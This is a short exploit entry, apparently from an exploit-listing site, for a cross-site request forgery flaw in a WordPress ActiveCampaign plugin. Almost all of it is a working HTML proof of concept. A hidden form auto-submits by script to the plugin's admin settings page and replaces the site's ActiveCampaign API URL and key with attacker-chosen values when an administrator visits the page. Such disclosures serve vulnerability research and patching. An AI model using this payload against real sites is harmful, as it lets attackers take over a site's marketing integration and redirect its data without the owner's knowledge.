Share
## https://sploitus.com/exploit?id=WPEX-ID:10393
When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed.

<html>
  <body>
    <form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
      <input type="hidden" name="api&#95;url" value="https&#58;&#47;&#47;yopmail59247&#46;api&#45;us1&#46;com" />
      <input type="hidden" name="api&#95;key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>